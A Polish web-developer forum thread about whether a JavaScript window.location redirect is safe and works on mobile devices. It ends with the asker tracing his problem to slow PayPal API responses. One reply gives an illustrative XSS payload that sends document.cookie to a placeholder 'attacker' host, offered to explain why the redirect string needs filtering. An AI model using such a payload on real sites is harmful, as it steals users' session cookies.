Witam,
Czy bezpiecznie jest uzywac przekierowania na inna podstone kodu napisanego w JS: window.location? Strona jest sporo uzywana przez tablety, smartphnes jak iPhone etc.
0
0
O ile kontrolujesz (filtrujesz) przypisywany string to nie powinno być problemu.
0
@Maciej Cąderek Co masz na mysli filtruje? Na stronie mam 3 zdazenia, zaleznie od zdazenia przekierowuje na odpowiedni link. Wstrzykuje string z url z php do jquery i to wszsytko. Zastanawiam sie np czy jakies stare przegladarki moge nie obllogiwac window.location? Szczegolnie te na smartfonach, bo chyba tam jest najwiekszy problem z przekierowaniem.
0
@poniatowski przykładowy atak xss:
window.location='http://attacker/?cookie='+document.cookie
0
@Desu Ok, dodalem funcje filtrujaca string przed atakami XSS. Tak, czy siak na tabletach i smartphonach takie przekierowanie powinno dzialac? Czy sa jakies zastrzezenia?
0
A nie możesz sprawdzić? Jak odpalisz server na swoim adresie IP(zamiast localhost) to mozesz ją otworzyć w sieci lokalnej na tablecie i telefonie.
0
@dzek69 - do kosza proszę!
0
Problem okazał się być w powolnej 'pracy' serwera PayPal. Dodatkowo wszystko co się wykonało po wysłaniu formularzu było poprzedzone ignore_user_abort ustawione na true. Sam request i odpowiedz do PayPala przez API trwała od 2-4 sekund. Co jest mega długo i użytkownik nie miał żadnej wiadomości, że strona się jeszcze ładuje itd. Więc po pierwsze wywaliłem ignore_user_abort. Następnie dodałem atrybut disable do przycisku formularza oraz jakiś image z loader'em i odpowiedni tekst do użytkownika. Do tego jeszcze ostatni warunek sprawdzający cały czas czy zamówienie zostało zapłacone, jeżeli okazało się, że tak to przekierowuję użytkownika do koszyka z odpowiednim komunikatem, żeby sprawdził pocztę.
Sam window.location chyba nie robił nic złego. Działa jak ma działać. Problem było długie odpowiedź od serwera PayPal.